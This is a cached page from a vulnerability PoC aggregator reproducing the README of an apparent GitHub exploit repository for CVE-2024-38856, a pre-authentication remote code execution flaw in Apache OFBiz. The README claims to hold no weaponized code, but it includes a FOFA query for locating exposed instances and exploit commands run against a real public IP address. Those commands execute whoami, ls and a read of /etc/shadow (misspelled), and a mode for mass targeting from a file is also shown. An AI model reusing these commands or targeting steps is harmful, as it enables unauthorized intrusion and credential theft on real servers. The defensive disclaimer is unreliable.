CVE-2024-38856 PoC — Apache OFBiz: Unauthenticated endpoint could allow execution of screen rendering code

Source

https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz

Associated Vulnerability

Title:Apache OFBiz: Unauthenticated endpoint could allow execution of screen rendering code (CVE-2024-38856)
Description:Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).

Description

CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit

Readme

# CVE-2024-38856 — Apache OFBiz (Repository documentation)

> **Repository purpose:** informational documentation about CVE-2024-38856 (Apache OFBiz incorrect-authorization / pre-auth RCE).  
> This repository **does not** contain weaponized exploit code. It is intended for defensive research, patching guidance, detection, and safe lab testing only.

---

## Overview

**CVE-2024-38856** is an incorrect-authorization vulnerability in Apache OFBiz that may allow unauthenticated access to certain endpoints and, under specific conditions, enable execution of screen rendering code which can lead to remote code execution on affected systems. The issue was fixed in Apache OFBiz **18.12.15**; earlier releases up to **18.12.14** are affected. :contentReference[oaicite:0]{index=0}

**Severity / Impact:** multiple security vendors and researchers rated this vulnerability as critical — it can lead to unauthenticated remote code execution on vulnerable instances, and has been observed in active exploitation attempts in the wild. Administrators should treat exposed OFBiz instances as high-priority remediation items. :contentReference[oaicite:1]{index=1}

---

## Affected versions

- Apache OFBiz: **through 18.12.14** (i.e., all releases <= 18.12.14 are considered vulnerable). The issue was addressed in **18.12.15**. Upgrade is recommended. :contentReference[oaicite:2]{index=2}

### ``` fofa : app="Apache_OFBiz" && port="8443" ```

<img width="1916" height="956" alt="Screenshot 2025-10-10 183057" src="https://github.com/user-attachments/assets/f16df50d-168f-467c-8b90-2e114d66d59d" />

# Exploit:

### ```  git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git ```

### ``` cd CVE-2024-38856-Apache-OFBiz ```

### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami" ```

### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig" ```

### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls" ```

### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow" ```

<img width="1478" height="745" alt="Screenshot 2025-10-10 184101" src="https://github.com/user-attachments/assets/87b05f89-3098-4a05-b30f-2e35713f4069" />

### ``` ─$ python3 apache_bang.py --file target.txt -c "ls" ```

<img width="1465" height="739" alt="Screenshot 2025-10-10 075018" src="https://github.com/user-attachments/assets/26b47ec5-ea76-4011-beda-ab6ccf38ced0" />

File Snapshot


 [4.0K]  /data/pocs/56358b3bf7c9b571b0637d0f7224ac4eb7345e2a
├── [7.9K]  Apache_bang.py
├── [1.0K]  LICENSE
└── [2.5K]  README.md

1 directory, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!